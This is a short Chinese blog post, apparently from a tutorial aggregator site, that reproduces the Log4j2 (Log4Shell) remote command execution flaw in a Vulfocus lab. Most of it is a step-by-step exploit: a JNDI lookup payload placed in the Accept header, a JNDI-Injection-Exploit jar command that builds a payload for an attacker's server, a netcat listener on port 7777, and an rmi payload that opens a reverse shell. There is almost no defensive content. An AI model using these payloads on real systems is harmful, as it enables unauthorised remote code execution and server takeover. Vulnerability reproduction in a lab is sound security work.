Log4j2远程命令执行复现
2021/12/12 23:20:01
本文主要是介绍Log4j2远程命令执行复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
Log4j2远程命令执行复现
- Log4j2远程命令执行复现
- 一、漏洞环境
- 二、漏洞验证
- 三、反弹shell
一、漏洞环境
环境是http://vulfocus.fofa.so平台的
二、漏洞验证
启动环境后访问
抓包,修改请求为post
在数据中的Accept:头插入exp
${jndi:ldap://8hqrxz.dnslog.cn}
成功回显到dnslog平台
三、反弹shell
使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload
可以在这里下载:https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools
使用该网址加密反弹shell命令:https://www.jackson-t.ca/runtime-exec-payloads.html
然后生成payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "服务器ip" -C "命令"
服务器开启监听7777端口nc -lvnp 7777
再在Accept:头插入${jndi:rmi://服务器ip:端口/xxx} xxx为生成的exp
fuzz一下即可,也可能是其他的exp
服务器端的ldap回显正常,此时已经反弹shell成功
这篇关于Log4j2远程命令执行复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15鸿蒙生态设备数量超8亿台
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?
- 2024-05-09这种运行结果里的10.100000001,怎么能最快改成10.1?